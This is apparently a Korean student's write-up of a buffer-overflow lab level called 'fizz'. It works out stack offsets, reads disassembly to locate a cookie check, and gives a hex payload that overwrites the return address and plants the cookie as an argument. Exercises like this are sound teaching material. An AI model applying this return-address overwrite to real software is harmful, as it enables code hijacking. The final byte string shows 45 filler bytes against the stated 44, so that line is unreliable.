ebp = 0x55683370
return = (ebp+4)=(0x55683374)=0x08048c03
buf = ebp-0x28 = ebp-40

넣어야 하는 문자열의 길이
= buf 시작 ~ ebp ~ ebp+4(=return)
= 40+4+4
= 48

이 때 return에 들어가는 값이 fizz의 시작 주소인
0x08048b3e가 되어야 함.

=> (무의미 44byte)+3e 8b 04 08

여기까지는 Lv0과 같음

________________________


그런데 val을 cookie(=0x7220cc64)와 같게 해야 함.
따라서 val을 넣어 놓은 주소를 찾자.

아래는 fizz 코드의 일부다.
0x08048b44 <fizz+6>:    mov    0x8(%ebp),%edx
0x08048b47 <fizz+9>:    mov    0x804c204,%eax
0x08048b4c <fizz+14>:   cmp    %eax,%edx

0x804c204에 cookie가 저장되어 있고,
edx와 비교하는 것을 볼 때, edx에 val이 저장되어 있을 것이다.

edx가 참조하는 값은 ebp + 0x8

따라서 답은 0번 답에 0x7220cc64를 나타내는 값을 추가한다.

=> (무의미 44byte)+3e 8b 04 08+(무의미 4byte)+ 64 cc 20 72

61 61 61 61 61 62 62 62 62 63 63 63 63 64 64 64 64 65 65 65 65 66 66 66 66 67 67 67 67 68 68 68 68 69 69 69 69 70 70 70 70 71 71 71 71 3e 8b 04 08 dd dd dd dd 64 cc 20 72
